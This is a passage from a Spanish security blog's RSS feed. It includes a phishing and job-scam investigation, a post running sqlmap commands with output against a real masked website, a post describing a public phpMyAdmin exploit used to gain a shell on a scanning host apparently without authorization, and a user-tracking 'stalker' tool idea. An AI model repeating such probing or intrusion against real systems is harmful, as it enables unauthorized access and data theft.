ORO PLATA COMPANY</p>
<p>En cumplimiento de la normativa vigente en   materia de Servicios de la    Sociedad de la Informacion y de Comercio Electronico y de   Proteccion de Datos de Caracter Personal, te informamos que puedes revocar en   cualquier momento, de forma sencilla y gratuita, el consentimiento para la   recepción de mensajes promocionales de InfoJobs.net, dando de baja <a href="http://www.infojobs.net/candidato-login.xhtml">tus   suscripciones</a> o bien dándote de <a href="http://www.infojobs.net/candidato-login.xhtml">baja   del servicio</a> de Infojobs.net a traves del Menu privado. Por favor no respondas a este e-mail directamente.</p>
<p>INFOJOBS, S.A. CIF: A-62134309. Domicilio social en C/ Numancia 46. 08029   Barcelona.</td>
</tr>
<tr>
<td width="576" valign="top"><strong>Cabeceras   del email</strong></p>
<p>Return-Path:   &lt;stanleyhdisidoroz@hotmail.com&gt;</p>
<p>Received: from IMPmx10.adm.correo (10.20.102.117)</p>
<p>by tems5.backend.correo (8.5.113)</p>
<p>id 4B7CC227006CAD60 for CENSORED;   Mon, 01 Mar 2010 19:26:28 +0100</p>
<p>Received: from blu0-omc2-s26.blu0.hotmail.com   ([65.55.111.101])</p>
<p>by IMPmx10.adm.correo with BIZ IMP    id   nuSS1d00Z2BJekH0AuSSK6; Mon,</p>
<p>01 Mar 2010 19:26:27 +0100</p>
<p>Received: from BLU142-W21 ([65.55.111.73]) by   blu0-omc2-s26.blu0.hotmail.com</p>
<p>with Microsoft SMTPSVC(6.0.3790.3959); Mon, 01   Mar 2010 10:26:25 -0800</p>
<p>Date: Mon, 1 Mar 2010 20:26:26 +0200</p>
<p>From: Stanley ISIDORO &lt;StanleyHdISIDOROZ@hotmail.com&gt;</p>
<p>Subject: OFERTA DE EMPLEO</p>
<p>X-Originating-IP: [201.37.198.16]</p>
<p>Sender: stanleyhdisidoroz@hotmail.com</p>
<p>To:CENSORED</p>
<p>Message-ID:   &lt;BLU142-W21E88A1B063A554C7A3E16A43C0@phx.gbl&gt;</p>
<p>X-UID:</p>
<p>MIME-Version: 1.0</p>
<p>Content-Type: multipart/alternative;</p>
<p>boundary=&#8221;Boundary_(ID_R1dIzlzZEdcz0W/vQcOUWA)&#8221;</p>
<p>Importance: Normal</p>
<p>X-Bogosity: Unsure, tests=bogofilter,   spamicity=0.520000, version=1.2.0</p>
<p>X-OriginalArrivalTime: 01 Mar 2010 18:26:25.0952   (UTC)</p>
<p>FILETIME=[B3E9A200:01CAB96C]</td>
</tr>
</tbody>
</table>
<p>Apartir de estos emails podemos extraer la siguiente información:</p>
<p>IPs de origen de uno de los emails:</p>
<p><strong>201.37.198.16  (owner: NET Serviços de Comunicação S.A.. &#8211; responsible: Grupo de Segurança da Informação Vírtua &#8211; country:BR)</strong></p>
<p>Dominios que aparecen en las direcciones de email a las que hay que responder:</p>
<p><strong>Empleosupport.net</strong></p>
<p><strong>Espempleo.net</strong></p>
<p><strong>Es-tr.net</strong></p>
<p>La direccion IP del unico email del que disponemos las cabeceras la podemos encontrar en 4 blacklists de spammers conocidos.</p>
<p><a href="http://www.mxtoolbox.com/SuperTool.aspx?action=blacklist%3a201.37.198.16">http://www.mxtoolbox.com/SuperTool.aspx?action=blacklist%3a201.37.198.16</a></p>
<p><a href="http://www.madgoblin.net/wp-content/uploads/2010/03/image003.jpg"><img class="alignnone size-medium wp-image-198" title="image003" src="http://www.madgoblin.net/wp-content/uploads/2010/03/image003-300x184.jpg" alt="" width="405" height="248" /></a></p>
<p>Los dominios son una copia levemente modificada de un portal de empleo de Navarra. Dichos dominios han sido registrados en china el dia 25/2/2010 por la misma “persona” (seguramente falsa)</p>
<table border="0" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td width="432" valign="top">Domain   Name&#8230;&#8230;&#8230;. empleosupport.net</p>
<p>Creation   Date&#8230;&#8230;.. 2010-02-25 12:16:55</p>
<p>Registration   Date&#8230;. 2010-02-25 12:16:55</p>
<p>Expiry   Date&#8230;&#8230;&#8230;. 2011-02-25 12:16:55</p>
<p>Organisation   Name&#8230;. zhang hai yun</p>
<p>Organisation   Address. chongqingshinanxialu123hao</p>
<p>Organisation   Address.</p>
<p>Organisation Address. chongqing</p>
<p>Organisation Address. 021221</p>
<p>Organisation Address. CQ</p>
<p>Organisation Address. CN</td>
</tr>
<tr>
<td width="432" valign="top">Domain   Name&#8230;&#8230;&#8230;. es-tr.net</p>
<p>Creation Date&#8230;&#8230;.. 2010-02-25 12:20:46</p>
<p>Registration Date&#8230;. 2010-02-25 12:20:46</p>
<p>Expiry Date&#8230;&#8230;&#8230;. 2011-02-25 12:20:46</p>
<p>Organisation Name&#8230;. zhang hai yun</p>
<p>Organisation Address. chongqingshinanxialu123hao</p>
<p>Organisation Address.</p>
<p>Organisation   Address. chongqing</p>
<p>Organisation Address. 021221</p>
<p>Organisation Address. CQ</p>
<p>Organisation Address. CN</td>
</tr>
</tbody>
</table>
<p><strong>Pagina Original </strong></p>
<p><strong> </strong></p>
<p><a href="http://www.madgoblin.net/wp-content/uploads/2010/03/image004.jpg"><img class="alignnone size-medium wp-image-200" title="image004" src="http://www.madgoblin.net/wp-content/uploads/2010/03/image004-300x243.jpg" alt="" width="480" height="388" /></a></p>
<p><strong>Sitios fraudulentos</strong></p>
<p><a href="http://www.madgoblin.net/wp-content/uploads/2010/03/image005.jpg"><img class="alignnone size-medium wp-image-201" title="image005" src="http://www.madgoblin.net/wp-content/uploads/2010/03/image005-300x243.jpg" alt="" width="477" height="386" /></a></p>
<p><a href="http://www.madgoblin.net/wp-content/uploads/2010/03/image006.jpg"><img class="alignnone size-medium wp-image-199" title="image006" src="http://www.madgoblin.net/wp-content/uploads/2010/03/image006-300x243.jpg" alt="" width="475" height="384" /></a></p>
<p><strong><br />
</strong></p>
<p>Los dominios ofertas-laborales.com y espempleo.net ya no existen, pero atraves de la cache de Google se puede ver aun el contenido.</p>
<p>Resalto las paginas identicas entre dominios.</p>
<p><a href="http://www.madgoblin.net/wp-content/uploads/2010/03/image007.jpg"><img class="alignnone size-medium wp-image-203" title="image007" src="http://www.madgoblin.net/wp-content/uploads/2010/03/image007-300x243.jpg" alt="" width="475" height="384" /></a></p>
<p><a href="http://www.madgoblin.net/wp-content/uploads/2010/03/image008.jpg"><img class="alignnone size-medium wp-image-202" title="image008" src="http://www.madgoblin.net/wp-content/uploads/2010/03/image008-300x243.jpg" alt="" width="473" height="383" /></a></p>
<p>Estos dominios apuntan todos a una misma direccion IP (112.159.237.58) en la cual hay los siguientes dominios identificados a dia de hoy.</p>
<table border="0" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td width="576" valign="top">*.boxingeatingshare.cn</p>
<p>*.cashsmart.cn</p>
<p><strong>*.es-tr.net</strong></p>
<p>*.gamingeurocasino.net</p>
<p>*.play777vegas.net</p>
<p>backstorypalmlaws.cn</p>
<p>boxingeatingshare.cn</p>
<p>gamingeurocasino.net</p>
<p>manicash.net</p>
<p>ns1.boxingeatingshare.cn</p>
<p>ns1.gamingeurocasino.net</p>
<p>ns1.manicash.net</p>
<p>ns1.play777vegas.net</p>
<p>ns2.boxingeatingshare.cn</p>
<p>ns2.gamingeurocasino.net</p>
<p>ns2.manicash.net</p>
<p>ns2.play777vegas.net</p>
<p>ns3.boxingeatingshare.cn</p>
<p>ns3.gamingeurocasino.net</p>
<p>ns3.manicash.net</p>
<p>ns3.play777vegas.net</p>
<p>ns4.boxingeatingshare.cn</p>
<p>ns4.gamingeurocasino.net</p>
<p>ns4.manicash.net</p>
<p>ns4.play777vegas.net</p>
<p>play777vegas.net</p>
<p>www.backstorypalmlaws.cn</p>
<p>www.boxingeatingshare.cn</p>
<p>www.es-tr.net</p>
<p>www.gamingeurocasino.net</p>
<p>www.play777vegas.net</td>
</tr>
</tbody>
</table>
<p>Se trata de paginas de casinos online que intentan infectar el ordenador de quien juegue, con troyanos bancarios, etc…</p>
<p><a href="http://www.madgoblin.net/wp-content/uploads/2010/03/image009.jpg"><img class="alignnone size-medium wp-image-205" title="image009" src="http://www.madgoblin.net/wp-content/uploads/2010/03/image009-253x300.jpg" alt="" width="253" height="300" /></a></p>
<p><a href="http://www.madgoblin.net/wp-content/uploads/2010/03/image010.jpg"><img class="alignnone size-medium wp-image-206" title="image010" src="http://www.madgoblin.net/wp-content/uploads/2010/03/image010-300x217.jpg" alt="" width="420" height="303" /></a></p>
<p>Resultados de dicho ejecutable enviado a virustotal</p>
<p><a href="http://www.madgoblin.net/wp-content/uploads/2010/03/image011.jpg"><img class="alignnone size-medium wp-image-204" title="image011" src="http://www.madgoblin.net/wp-content/uploads/2010/03/image011-300x217.jpg" alt="" width="417" height="301" /></a></p>
<p>En la pagina del investigador Dancho Danchev hay un analisis de estos dominios (y mas) que forman esta red de estafas.</p>
<p><a href="http://ddanchev.blogspot.com/2010/02/dont-play-poker-on-infected-table-part.html">http://ddanchev.blogspot.com/2010/02/dont-play-poker-on-infected-table-part.html</a></p>
<p>Mi conclusion es que esta campaña se esta llevando a cabo para conseguir victimas que blanqueen el dinero obtenido a partir de las paginas de casinos online.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.madgoblin.net/?feed=rss2&amp;p=197</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Adquisicion de informacion para n00bs</title>
		<link>http://www.madgoblin.net/?p=172</link>
		<comments>http://www.madgoblin.net/?p=172#comments</comments>
		<pubDate>Wed, 24 Feb 2010 21:39:54 +0000</pubDate>
		<dc:creator>Eidan</dc:creator>
				<category><![CDATA[paros proxy]]></category>
		<category><![CDATA[penetration testing]]></category>
		<category><![CDATA[sql]]></category>
		<category><![CDATA[sql injection]]></category>

		<guid isPermaLink="false">http://www.madgoblin.net/?p=172</guid>
		<description><![CDATA[Por alguna extraña razon, este post esta marcado como draft&#8230; ¿se habra perdido en la migracion? Sea como sea, lo publico aunque sea de&#8230; oh dios mio&#8230; del 2007??? y ya hacia estas cosas yo??? &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211; Herramientas: Paros Proxy Sqlmap Tiempo:15 minutos (Por alguna extraña razon la version 5 de sqlmap no queria ir en [...]]]></description>
			<content:encoded><![CDATA[<p>Por alguna extraña razon, este post esta marcado como draft&#8230; ¿se habra perdido en la migracion? Sea como sea, lo publico aunque sea de&#8230; oh dios mio&#8230; del 2007??? y ya hacia estas cosas yo???</p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p>Herramientas:<br />
Paros Proxy<br />
Sqlmap<br />
Tiempo:15 minutos (Por alguna extraña razon la version 5 de sqlmap no queria ir en mi mac, asi que al final use la 4)</p>
<p><strong>Paros</strong><br />
<a href="http://www.madgoblin.net/uploaded_images/paros2-715761.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img style="display: block; margin: 0px auto 10px; text-align: center; cursor: hand;" src="http://www.madgoblin.net/uploaded_images/paros2-715754.png" border="0" alt="" /></a></p>
<p><a href="http://www.madgoblin.net/uploaded_images/paros1-758288.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img style="display: block; margin: 0px auto 10px; text-align: center; cursor: hand;" src="http://www.madgoblin.net/uploaded_images/paros1-758281.png" border="0" alt="" /></a></p>
<p><strong>Sqlmap</strong><br />
<code><br />
./sqlmap.py --url="http://www.*******.info/index.php?id=fviewid&amp;v=6" -b</code></p>
<p>sqlmap/0.4 coded by inquis<br />
and belch</p>
<p>[*] starting at: 13:23:13<br />
[13:33:40] [WARNING] parameter &#8216;id&#8217; is not injectable<br />
remote DBMS:    MySQL &lt; 5.0.0<br />
banner:    &#8217;4.1.22-standard-log&#8217;<br />
[*] shutting down at: 13:25:39</p>
<p>./sqlmap.py &#8211;url=&#8221;http://www.*******.info/index.php?id=fviewid&amp;v=6&#8243; &#8211;current-user &#8211;current-db</p>
<p>sqlmap/0.4 coded by inquis<br />
and belch</p>
<p>[*] starting at: 13:33:34<br />
[13:23:19] [WARNING] parameter &#8216;id&#8217; is not injectable<br />
remote DBMS:    MySQL &lt; 5.0.0<br />
current user:    &#8216;sO2a846O_*******@localhost&#8217;<br />
current database:    &#8216;sO2a846O_*******&#8217;<br />
[*] shutting down at: 13:34:52</p>
<p>Si usara una version de MySql mas moderna se podria conseguir sin mucha dificultad una lista de users + hashes de passwords entre otras cosas <img src='http://www.madgoblin.net/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /><br />
A ver si un dia aprendo a hacer lo mismo en versiones mas antiguas del mysql que aun corren por ahi.</p>
<p>(^o^)</p>
]]></content:encoded>
			<wfw:commentRss>http://www.madgoblin.net/?feed=rss2&amp;p=172</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Miniproyectos flotantes</title>
		<link>http://www.madgoblin.net/?p=188</link>
		<comments>http://www.madgoblin.net/?p=188#comments</comments>
		<pubDate>Tue, 16 Feb 2010 10:49:54 +0000</pubDate>
		<dc:creator>Eidan</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://www.madgoblin.net/?p=188</guid>
		<description><![CDATA[Ya llevo unos dias teniendo ganas de escribir de nuevo, pero realmente no se me ocurria sobre QUE escribir&#8230; asi que voy a poner simplemente los miniproyectos que creo que podrian estar bien hacerse para, como minimo, recordarlos Google Buzz Stalker Programita que capture los movimientos que efectua un usuario a lo largo del tiempo [...]]]></description>
			<content:encoded><![CDATA[<p>Ya llevo unos dias teniendo ganas de escribir de nuevo, pero realmente no se me ocurria sobre QUE escribir&#8230; asi que voy a poner simplemente los miniproyectos que creo que podrian estar bien hacerse para, como minimo, recordarlos <img src='http://www.madgoblin.net/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p><strong>Google Buzz Stalker</strong></p>
<p>Programita que capture los movimientos que efectua un usuario a lo largo del tiempo para poder extraer patrones.</p>
<p><strong>Google Maps Image Generator</strong></p>
<p>Un sistema simple para poder grabar una imagen G-R-A-N-D-E de una zona del mapa. Se podrian hacer posters A3 o A2 de un barrio o que se yo. <img src='http://www.madgoblin.net/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
]]></content:encoded>
			<wfw:commentRss>http://www.madgoblin.net/?feed=rss2&amp;p=188</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>&quot;M Fucking Scanner&quot; , o como un hacker puede ser subnormal</title>
		<link>http://www.madgoblin.net/?p=184</link>
		<comments>http://www.madgoblin.net/?p=184#comments</comments>
		<pubDate>Wed, 22 Jul 2009 12:14:00 +0000</pubDate>
		<dc:creator>Eidan</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://www.madgoblin.net/?p=184</guid>
		<description><![CDATA[Esto es el colmo&#8230; mirando mi access.log del apache me he encontrado con lo siguiente: 204.***.***.*** &#8211; - [22/Jul/2009:10:01:18 +0200] &#8220;GET /phpmyadmin/INSTALL HTTP/1.1&#8243; 404 216 &#8220;-&#8221; &#8220;M Fucking Scanner.&#8221;204.***.***.*** &#8211; - [22/Jul/2009:10:01:18 +0200] &#8220;GET /myadmin/INSTALL HTTP/1.1&#8243; 404 213 &#8220;-&#8221; &#8220;M Fucking Scanner.&#8221;204.***.***.*** &#8211; - [22/Jul/2009:10:01:19 +0200] &#8220;GET /admin/INSTALL HTTP/1.1&#8243; 404 211 &#8220;-&#8221; &#8220;M Fucking Scanner.&#8221;204.***.***.*** [...]]]></description>
			<content:encoded><![CDATA[<p>Esto es el colmo&#8230; mirando mi access.log del apache me he encontrado con lo siguiente:</p>
<p>204.***.***.*** &#8211; - [22/Jul/2009:10:01:18 +0200] &#8220;GET /phpmyadmin/INSTALL HTTP/1.1&#8243; 404 216 &#8220;-&#8221; &#8220;M Fucking Scanner.&#8221;<br />204.***.***.*** &#8211; - [22/Jul/2009:10:01:18 +0200] &#8220;GET /myadmin/INSTALL HTTP/1.1&#8243; 404 213 &#8220;-&#8221; &#8220;M Fucking Scanner.&#8221;<br />204.***.***.*** &#8211; - [22/Jul/2009:10:01:19 +0200] &#8220;GET /admin/INSTALL HTTP/1.1&#8243; 404 211 &#8220;-&#8221; &#8220;M Fucking Scanner.&#8221;<br />204.***.***.*** &#8211; - [22/Jul/2009:10:01:19 +0200] &#8220;GET /phpMyAdmin/INSTALL HTTP/1.1&#8243; 404 216 &#8220;-&#8221; &#8220;M Fucking Scanner.&#8221;</p>
<p>Ya tengo muy vistos los scanners que buscan phpmyadmins o similares y como que ya paso, pero este en especial me ha tocado la moral. ¿Si haces algo, hazlo bien no? Que es ese useragent tan CUTRE? ¿Se piensa que es el IMBA HAXXOR OF DA DEATH?</p>
<p>Lo primero que he hecho es ver &#8220;que tiene&#8221; con un nmap</p>
<p>PORT     STATE SERVICE VERSION<br />80/tcp   open  http    Apache httpd 2.0.52 ((CentOS))<br />|_ html-title: Apache HTTP Server Test Page powered by CentOS<br />1863/tcp open  msnp?<br />5190/tcp open  aol?</p>
<p>Ummm al abrir la direccion con un browser aparece la pagina por defecto de apache, asi que, una vez mas, han rebentado un novatillo que no securiza su sistema.<br />Que pasara si pongo /phpmyadmin/ ?</p>
<p><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.madgoblin.net/uploaded_images/phpmyadmin-783303.jpg"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 139px;" src="http://www.madgoblin.net/uploaded_images/phpmyadmin-783301.jpg" alt="" border="0" /></a><br />Al abrir la pagina de &#8220;No te sabes el login y mereces morir&#8221; pude ver la version que era (realmente antigua) y hice la visita standard a milw0rm:</p>
<p>http://www.milw0rm.com/exploits/8992</p>
<p>Este exploit parece que deberia de ir&#8230; ¿el haXX0r novato habra modificado el codigo? Me jugaria alguna parte de mi cuerpo a que no. Veamos que hace el exploit&#8230;
<pre> FWrite($Handlex, "\n[!] w00t! w00t! You should now have shell here"); FWrite($Handlex, "\n[+] ".$w00t."config/config.inc.php?c=id \n");</pre>
<p>¿Sera posible?¿Funcionara?</p>
<p><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.madgoblin.net/uploaded_images/uname-742988.jpg"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 77px;" src="http://www.madgoblin.net/uploaded_images/uname-742985.jpg" alt="" border="0" /></a><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.madgoblin.net/uploaded_images/netstat-783710.jpg"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 272px;" src="http://www.madgoblin.net/uploaded_images/netstat-783706.jpg" alt="" border="0" /></a></p>
<p>Ahora se me presentan un par de dudas existenciales:</p>
<p>¿Deberia de avisar al propietario y de que forma?<br />¿Seria etico que, cuando se detectan escaneos de este tipo, utilizar los exploits publicos para &#8220;rehackear&#8221; la maquina atacante y &#8220;limpiarla&#8221;?</p>
]]></content:encoded>
			<wfw:commentRss>http://www.madgoblin.net/?feed=rss2&amp;p=184</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Psicologia &#8211; Hacking</title>
		<link>http://www.madgoblin.net/?p=183</link>
		<comments>http://www.madgoblin.net/?p=183#comments</comments>
		<pubDate>Fri, 10 Jul 2009 11:32:00 +0000</pubDate>
		<dc:creator>Eidan</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://www.madgoblin.net/?p=183</guid>
		<description><![CDATA[Lenguaje corporal &#8211; NmapPNL &#8211; ExploitsAnclajes &#8211; Troyanos Despues de unos dias hackeando &#8220;wetware&#8221; empiezo a sentir lo que senti en su dia al leer los primeros textos sobre las bluebox, telnets y similares. La emocion de modificar creaciones de otros y ver como hace lo que TU quieres. La seguridad de saber como funciona [...]]]></description>
			<content:encoded><![CDATA[<p>Lenguaje corporal &#8211; Nmap<br />PNL &#8211; Exploits<br />Anclajes &#8211; Troyanos</p>
<p>Despues de unos dias hackeando &#8220;wetware&#8221; empiezo a sentir lo que senti en su dia al leer los primeros textos sobre las bluebox, telnets y similares. La emocion de modificar creaciones de otros y ver como hace lo que TU quieres. La seguridad de saber como funciona esa masa de materia gris y predecir sus actos&#8230;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.madgoblin.net/?feed=rss2&amp;p=183</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Paranoia en los aviones&#8230;</title>
		<link>http://www.madgoblin.net/?p=182</link>
		<comments>http://www.madgoblin.net/?p=182#comments</comments>
		<pubDate>Mon, 02 Jun 2008 12:45:00 +0000</pubDate>
		<dc:creator>Eidan</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://www.madgoblin.net/?p=182</guid>
		<description><![CDATA[Acabo de leer una noticia bastante curiosa: EU project scans air passengers for terrorist tendencies&#8220;An EU aviation safety project is testing a camera-based passenger surveillance system intended to spot terrorists poised to rush the cockpit.&#8221;&#8220;Each camera tracks passengers’ facial expressions, with the footage then analysed by software to detect developing terrorist activity or potential air [...]]]></description>
			<content:encoded><![CDATA[<p>Acabo de leer una noticia bastante curiosa:</p>
<p><span style="font-style: italic;">EU project scans air passengers for terrorist tendencies</span><br /><span style="font-style: italic;">&#8220;An EU aviation safety project is testing a camera-based passenger surveillance system intended to spot terrorists poised to rush the cockpit.&#8221;</span><br /><span style="font-style: italic;">&#8220;Each camera tracks passengers’ facial expressions, with the footage then analysed by software to detect developing terrorist activity or potential air rage.&#8221;</span></p>
<p>No estoy seguro pero, diria que me es familiar&#8230; como si hace un tiempo hubiera visto una peli con algo parecido&#8230; Minority Report</p>
<p>En ella, la policia utiliza unos humanos psiquicos para poder predecir cuando alguien &#8220;teoricamente&#8221; va a cometer un crimen. El problema que tenemos aqui es que estas juzgando a alguien antes de que haga nada.</p>
<p>Imaginemos que viajo con una persona y discuto con ella durante el vuelo por una causa random&#8230; ¿soy un terrorista por tener la cara de asesino en ese momento? ¿No se supone que somos inocentes hasta que se demuestre lo contrario?</p>
<p>Welcome 1984.</p>
<p>
<h2></h2>
]]></content:encoded>
			<wfw:commentRss>http://www.madgoblin.net/?feed=rss2&amp;p=182</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
